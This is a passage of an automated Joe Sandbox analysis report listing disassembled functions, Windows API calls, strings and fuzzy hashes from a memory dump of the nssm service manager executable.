                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92916CB1204B8582EB21DB66F4507EA73A5E78D7D8F400226BB8947BE9DF3CC505CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1837315383-0
                                                                                                                                                                                                                                  • Opcode ID: bccae4bd231a9912c3283bc4a7c2a7bd25a2fd8f9863592ea5e6a2561338ea26
                                                                                                                                                                                                                                  • Instruction ID: 5dd4c118b56c093f2d9eb2cd8d1b4151889c08f3b9d9fd89a1adfc0aa14c9b18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bccae4bd231a9912c3283bc4a7c2a7bd25a2fd8f9863592ea5e6a2561338ea26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF1A3362006808AE722DF26E4407ED77A1F74CBE8F544629FB5A5BBF5DB7AC9418700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,?,?,?,000000014001CA44,?,?,?,?,000000014001DA49,?,?,00000000,0000000140018CC8), ref: 000000014001C8AB
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(?,?,?,?,?,000000014001CA44,?,?,?,?,000000014001DA49,?,?,00000000,0000000140018CC8), ref: 000000014001C9B7
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 000000014001C9F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                  • API String ID: 3784150691-4022980321
                                                                                                                                                                                                                                  • Opcode ID: 36831cd5a10b95795657598e323fad1e6039fa129907da8cb05892a2d8101dd3
                                                                                                                                                                                                                                  • Instruction ID: 158239c26d78b35aebb999fdebf67af958850c7b8c6e2e081e45271b36388c4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36831cd5a10b95795657598e323fad1e6039fa129907da8cb05892a2d8101dd3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251D23132074041FB26DB67E959BEA6352B78D7D4F44421ABF498BAF6CF3EC9458200
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3778485334-0
                                                                                                                                                                                                                                  • Opcode ID: fcba0c9a95c159ebbb5f19d747e1dd1b742dabd106ec79fcedca0d593e48de29
                                                                                                                                                                                                                                  • Instruction ID: f1032b50662743d3f9ed8e389efd49878f2020c5d23694adabdf4963dca75d35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcba0c9a95c159ebbb5f19d747e1dd1b742dabd106ec79fcedca0d593e48de29
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6631AF35604B8486EB529B56F89439A73A0F78C794F90412AFB8D47BB5EF7CC958CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3895584640-0
                                                                                                                                                                                                                                  • Opcode ID: c64bca45c4e632594db7f04430d10261d1ff36c681336175f05c22bc56c5965e
                                                                                                                                                                                                                                  • Instruction ID: c60ee9f6f2ed2a00dbdcee0de5611415eccf768e0bffb7d0a83f9caa29d6870b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c64bca45c4e632594db7f04430d10261d1ff36c681336175f05c22bc56c5965e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79518632A087C08AF7B29F66E4407DEB690E3897D4F548219F79947AE6CE79CC418F05
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _snwprintf_s$ExtensionFindPathSystemTime
                                                                                                                                                                                                                                  • String ID: %s%s$-%04u%02u%02uT%02u%02u%02u.%03u%s
                                                                                                                                                                                                                                  • API String ID: 3012895273-3937541175
                                                                                                                                                                                                                                  • Opcode ID: 560cd04c05b633e3444378748bc9db53c4deef8fd261067b4b594a2d44b49ef9
                                                                                                                                                                                                                                  • Instruction ID: fdc0a7761a39236e0085d0e908164e213fbadb0a3e7f3d4d85caba3a5e144ff7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560cd04c05b633e3444378748bc9db53c4deef8fd261067b4b594a2d44b49ef9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8421BF7261468492E7618F62F8413DAB3A0F7887E0F504325BBA807AE8EB3CC561CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1269745586-0
                                                                                                                                                                                                                                  • Opcode ID: 21740ca0210804651a32995732c02466f39dbebba8e5c1d4456dcd31689a179e
                                                                                                                                                                                                                                  • Instruction ID: 9a6ec38f7499756d9109093292aac8134069ac334cf027202bf93e78f28cf500
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21740ca0210804651a32995732c02466f39dbebba8e5c1d4456dcd31689a179e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E314F32208B8192DB65CB92F4543DEB3A0F78D784F504129EB8D43A69EF3CC649CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 940021595-0
                                                                                                                                                                                                                                  • Opcode ID: 2fc8f0ab683cfa301e52de69c18a5001071129caf8aa89df76005276f03be181
                                                                                                                                                                                                                                  • Instruction ID: 4dc7606bd390e8bd4b628dba781c3fbbeb28fa538c0f9e313f0e833a8577a474
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fc8f0ab683cfa301e52de69c18a5001071129caf8aa89df76005276f03be181
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88018471B0478082EB569B93B844B9A66A0E74CFC0F48883DEF4E43B74DF3CD9418610
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$DecodePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2310398763-0
                                                                                                                                                                                                                                  • Opcode ID: 6e4830eea65f689e2e9c02752a50a0a921c2b0a0aa5ca2082d0d00b6ea7b1ab3
                                                                                                                                                                                                                                  • Instruction ID: ddd726650d37943f5a27571a8053a69d6e87229a5d94401a073bd50349af247e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e4830eea65f689e2e9c02752a50a0a921c2b0a0aa5ca2082d0d00b6ea7b1ab3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431E27261065442F3379B2AA5857AE3662A78D3A4FA48315FF500B6F6CF7E85408704
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$DecodePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2310398763-0
                                                                                                                                                                                                                                  • Opcode ID: da396be412eb09d00cf55909acb0d4f6c12f72b4c56f9ad6242691f80ab35efa
                                                                                                                                                                                                                                  • Instruction ID: 39f1a80d13205377c565128548aeb2a8728b0da753896f78da85467891aa5801
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da396be412eb09d00cf55909acb0d4f6c12f72b4c56f9ad6242691f80ab35efa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9841943220878146E7629F2AE481BAE7671F7897E4F544325FB6D1B7E5CB3AC4518B00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlCaptureContext.KERNEL32 ref: 000000014002014F
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140020195
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 00000001400201A0
                                                                                                                                                                                                                                    • Part of subcall function 000000014001C7E8: GetModuleFileNameA.KERNEL32(?,?,?,?,?,000000014001CA44,?,?,?,?,000000014001DA49,?,?,00000000,0000000140018CC8), ref: 000000014001C8AB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2731829486-0
                                                                                                                                                                                                                                  • Opcode ID: 042e6ecb69b4d8c89ad470db03ded77f5232e2a147b3a08f763f1574a8481f5a
                                                                                                                                                                                                                                  • Instruction ID: f3e015452f8e06484b62b251be9eb4bda93d29b2c56fd27da54c05dbd6dfe062
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 042e6ecb69b4d8c89ad470db03ded77f5232e2a147b3a08f763f1574a8481f5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09014C31214B8492FA269B52E8647DA63A1FB8D385F40012DBB8E077F6DF3DC905CB11
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: dd67c572e47afb4fd1f864c50a0d8cabebd8ceb1d91faecee8d65b664636c922
                                                                                                                                                                                                                                  • Instruction ID: 17b87801de44675b32eab33a6e92beaa93f218bdb9ad0301ff8625300b3ea6f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd67c572e47afb4fd1f864c50a0d8cabebd8ceb1d91faecee8d65b664636c922
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E06D7161868082FA32D722E8113DA2BA0B79C7ACF900209FB8D476B6DE3DC605CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                  • Opcode ID: 0d7b36d036f9eae444fb279a002ebd7bf9a199c2ad1aba2446896ca5502ef0e1
                                                                                                                                                                                                                                  • Instruction ID: a7d7e5deb20b68404060ce561cd84d396d205446535e9e854855c5993caa0cd2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d7b36d036f9eae444fb279a002ebd7bf9a199c2ad1aba2446896ca5502ef0e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5B01230B11800D3DA05AB63DC963C033A0A75C350FC00811D20E87130DA3CC6DB8700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateErrorFileLast
                                                                                                                                                                                                                                  • String ID: AppStderr$AppStdout$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$stderr$stdin$stdout
                                                                                                                                                                                                                                  • API String ID: 1214770103-1833172568
                                                                                                                                                                                                                                  • Opcode ID: 704d25e325c4da692e4f34eeb43c0f0ef6c16f43b6528d6aee91bafc94aee580
                                                                                                                                                                                                                                  • Instruction ID: 6dc561daca946f61c0f22cad136355fe3536005ccb0e0e7bc192047253907c43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 704d25e325c4da692e4f34eeb43c0f0ef6c16f43b6528d6aee91bafc94aee580
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 950247B2611B8197EB66DF62B4447DAB3A4F74C788F800629EB9A43765DF3CD944CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Free$Heap$Memory$Process$Authority$AllocCloseError$ComputerIdentifierInitializeLastLocalLookupNameNamesStatus_vfwprintf_p
                                                                                                                                                                                                                                  • String ID: %s\%s$SID$expanded$username_sid
                                                                                                                                                                                                                                  • API String ID: 732754270-179756375
                                                                                                                                                                                                                                  • Opcode ID: 9924a99aa60350e3aba26c969b1aa10f1cab8c67048ae5d3a403f5550f0beb61
                                                                                                                                                                                                                                  • Instruction ID: 1121684c1e17a4b163b428ea974fafc3c98c08b9f612a778cafce4e2153dfe0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9924a99aa60350e3aba26c969b1aa10f1cab8c67048ae5d3a403f5550f0beb61
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2D15D75208A8092EA52EBA2F8503EA6761F7CDBD4F414125FB5E877B6DF39C845C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1012874770-0
                                                                                                                                                                                                                                  • Opcode ID: e4a7a92804d6637cb35f8b82645b6a85d45f9eb51bb75009f34d4de78484a897
                                                                                                                                                                                                                                  • Instruction ID: d795ce9bf5acc94cd1a5ed8fd5eb8a633197485917ecab5bcce8e78a9602e98a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4a7a92804d6637cb35f8b82645b6a85d45f9eb51bb75009f34d4de78484a897
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C741643221158481EA66AB77C8563EC23A1AB88B84F084132BF4D9F6B7CE32CD758354
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Alloc
                                                                                                                                                                                                                                  • String ID: dependencies$native_set_dependonservice
                                                                                                                                                                                                                                  • API String ID: 3689955550-2849880886
                                                                                                                                                                                                                                  • Opcode ID: c2fa873135db263471233eb41959948333d298384098abca38bdc9803a173968
                                                                                                                                                                                                                                  • Instruction ID: 58016f82e21d671278b264521194db2ee7ec021b3fb737f539fd2eb29f7a6210
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2fa873135db263471233eb41959948333d298384098abca38bdc9803a173968
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD719271604B8086EB25EBA7A4043DA63A1FB8DBD5F444129FB894BBB9DF3DC445CB40
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
